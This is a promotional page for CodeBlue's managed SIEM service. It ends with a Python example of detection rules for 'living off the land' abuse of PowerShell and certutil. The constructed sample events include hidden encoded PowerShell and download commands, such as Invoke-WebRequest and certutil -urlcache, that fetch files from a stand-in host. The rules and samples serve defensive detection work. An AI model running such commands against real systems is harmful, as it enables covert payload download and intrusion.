As the complexity and sophistication of cyber threats increase, your defences need to evolve to keep pace. Exploit techniques like “living off the land” demand new responses. In these techniques attackers implant low-footprint code or leverage native tools like PowerShell to snoop around your systems without attracting attention.
You may need to deploy solutions to combat these threats for a variety of reasons:
Do you have contractual commitments or cyber insurance requirements to store and analyse logs?
Is it a priority for your organisation to maintain a good cyber security posture?
Do your investors, government agencies, or financial/healthcare regulations demand a robust SIEM service?
CodeBlue’s Security Information and Event Monitoring (SIEM) service is designed to address cyber security challenges by providing comprehensive event logging and proactive threat detection.
Our service stores all logs, guaranteeing data integrity so that the information is ready for analysis and compliance when required. We use a sophisticated system of over 1,200 custom-developed rules, constantly updated to identify anomalies and potential threats, enabling detection of cyber attackers – especially those employing “living off the land” tactics.
To further enhance threat detection, the service integrates with local and global threat intelligence feeds, providing real-time insights into the latest security risks. Recognising that every business is unique, we also offer custom rule development, allowing us to adapt the system to your specific needs and requirements.
This managed service is monitored and maintained by CodeBlue, providing New Zealand organisations with peace of mind knowing their security is in expert hands.
At the heart of our SIEM solution are logging events from different systems, which store log data and make it available for real-time analysis. The CodeBlue SIEM platform – monitored by our SOC – uses these insights to proactively identify potential security threats that would otherwise be missed, enabling swift action to be taken to prevent breaches.
SIEM enables comprehensive visibility into your IT environment with detailed event logging and analysis. This enhances the ability of organisations to analyse stored data to gain insight into security events and trends.
By proactively storing all log activity, SIEM helps organisations meet regulatory compliance needs – especially in regulated industries. Because data is stored in a centralised location, separate from the system that generated it – which means it cannot be overwritten or altered when an attacker gains access to that system – SIEM allows companies to supply any recorded log data when it is demanded.
Increasing numbers of cyber insurers require policy holders to provide access to all log data in the aftermath of a cyber incident. Their forensic investigators will need the data to establish what happened, why, and where liability lies. SIEM allows you to meet these conditions.
SIEM on its own won’t stop cyberattacks or data breaches, but it is a valuable tool as part of a multi-layered cybersecurity strategy. SIEM provides the capability at a granular level to monitor, analyse and prevent hostile activities within your networks – contributing to an overall reduction in risk.
The New Zealand National Cyber Security Centre (NCSC) defines a series of Critical Controls which are best practices to prevent, detect, or contain the majority of cyber attacks experienced by New Zealand businesses. Centralised Logging is one of these Critical Controls – a feature of CodeBlue SIEM – which will help your organisation to achieve adherence.
CodeBlue is a well-established IT Managed Service provider with over 20 years of experience helping New Zealand businesses overcome their technology challenges. As a wholly owned subsidiary of FUJIFILM Business Innovation, we offer the maturity, systems, processes, and brand of a major MSP, combined with a commitment to delivering exceptional service to Kiwi businesses.
We pride ourselves on the quality of our service, demonstrated by our average service desk call answer time of just 18 seconds and a customer satisfaction rating of 94% for ticket resolution. We currently serve a customer base of over 300 organisations, so you can trust our expertise and experience to deliver a SIEM solution that meets your specific needs.
At CodeBlue, we believe in building strong, long-term partnerships with our clients. That’s why we offer open-term agreements with only 90 days’ notice, giving you the flexibility and confidence you deserve.
A SIEM service keeps a log of every event recorded within your infrastructure – which means it will store a lot of data. As such, it is designed for those organisations who have prioritised proactive cyber security measures and need that level of insight and control.
Further, many organisations are increasingly guided by the National Cyber Security Centre’s Critical Controls, which define centralised logging as a critical control that organisations should set up. SIEM features centralised logging as a core part of the solution, enabling organisations to adhere to that control.
“Living off the land” exploits represent a sophisticated and insidious form of cyberattack where malicious actors leverage legitimate tools and features already present within a targeted system or network to carry out their objectives. Unlike traditional attacks that rely on introducing external malware, these techniques blend seamlessly into the environment, making them exceptionally difficult to detect.
Attackers employing this method might abuse common administrative tools like PowerShell in Windows environments or built-in scripting utilities to execute commands, move laterally across the network, and access sensitive data. By “living off the land,” they minimise their digital footprint, avoiding the introduction of suspicious files that security software would typically flag.
The danger of these exploits lies in their ability to evade conventional security measures. Because the actions are performed using trusted tools, they often go unnoticed within standard logging and monitoring systems. Detecting “living off the land” attacks requires advanced threat detection capabilities, such as those offered by CodeBlue’s SIEM service, which can identify anomalous patterns of activity and suspicious usage of legitimate tools.
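To make the detection idea in the paragraphs above concrete, here is an added example of the kind of rule logic a SIEM applies to centrally collected process-creation logs. It is illustrative code written for this page, not CodeBlue’s rule set or platform. It assumes Windows Security Event ID 4688 events (with command-line auditing enabled) arriving as JSON lines with the standard 4688 field names (Computer, SubjectUserName, ParentProcessName, NewProcessName, CommandLine); the sample events, host names, user names and URLs are constructed for the example, and the base64 string is a placeholder rather than a real payload. The point is that a trusted tool such as PowerShell or certutil is not suspicious on its own: the rules only fire on the combination of tool, command-line pattern and parent process that legitimate administration rarely produces.

```python
import json
import re

# Script hosts and other legitimate Windows tools commonly reused by
# "living off the land" intrusions. Benign use is expected every day;
# only the tool-plus-context combinations below are flagged.
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Document-handling applications that should almost never spawn a script host.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "outlook.exe"}

# Command-line patterns that are unusual for interactive administration.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
HIDDEN_RE = re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden")
DOWNLOAD_RE = re.compile(r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)")
CERTUTIL_RE = re.compile(r"(?i)-(?:urlcache|decode)\b")


def basename(path):
    """Lower-cased file name from a Windows path such as C:\\Windows\\cmd.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of every rule matched by one process-creation event."""
    image = basename(event.get("NewProcessName", ""))
    parent = basename(event.get("ParentProcessName", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image in POWERSHELL and ENCODED_RE.search(cmd):
        hits.append("powershell_encoded_command")
    if image in POWERSHELL and HIDDEN_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        hits.append("powershell_hidden_download")
    if image == "certutil.exe" and CERTUTIL_RE.search(cmd):
        hits.append("certutil_download_or_decode")
    if image in SCRIPT_HOSTS and parent in DOCUMENT_APPS:
        hits.append("document_app_spawned_script_host")
    return hits


def scan(lines):
    """Parse JSON-lines 4688 events and return one finding per matching event."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("EventID") != 4688:
            continue  # these rules only apply to process-creation events
        rules = evaluate(event)
        if rules:
            findings.append({
                "host": event.get("Computer"),
                "user": event.get("SubjectUserName"),
                "image": basename(event.get("NewProcessName", "")),
                "rules": rules,
            })
    return findings


# Constructed sample events (not real telemetry) in the shape of 4688 JSON lines.
SAMPLE_LINES = [
    # Routine administrative use of PowerShell and certutil: nothing should fire.
    r'{"EventID": 4688, "Computer": "WS-042", "SubjectUserName": "jdoe", "ParentProcessName": "C:\\Windows\\explorer.exe", "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Service"}',
    r'{"EventID": 4688, "Computer": "WS-042", "SubjectUserName": "jdoe", "ParentProcessName": "C:\\Windows\\System32\\cmd.exe", "NewProcessName": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -dump C:\\certs\\root.cer"}',
    # Hidden-window PowerShell with an encoded command (base64 here is a placeholder, not a payload).
    r'{"EventID": 4688, "Computer": "WS-042", "SubjectUserName": "jdoe", "ParentProcessName": "C:\\Windows\\explorer.exe", "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE="}',
    # A word processor spawning a hidden PowerShell that fetches content from the network.
    r'{"EventID": 4688, "Computer": "WS-017", "SubjectUserName": "asmith", "ParentProcessName": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest http://example.invalid/update.txt"}',
    # certutil used as a downloader rather than for certificate handling.
    r'{"EventID": 4688, "Computer": "SRV-03", "SubjectUserName": "svc_backup", "ParentProcessName": "C:\\Windows\\System32\\cmd.exe", "NewProcessName": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"}',
    # A logon event, not process creation: ignored by these rules.
    r'{"EventID": 4624, "Computer": "WS-042", "SubjectUserName": "jdoe"}',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(f"{finding['host']} {finding['user']} {finding['image']}: {', '.join(finding['rules'])}")
```

Running the block prints three findings and stays silent on the two routine events, which is the behaviour a rule set needs: the signal comes from context (encoded or hidden-window invocations, download verbs, a document application as the parent), not from the mere presence of the tool. Such rules are only as good as the collected telemetry, so command-line auditing for 4688 (or an equivalent endpoint sensor) must be enabled and forwarded to the central store before an attacker can clear local logs.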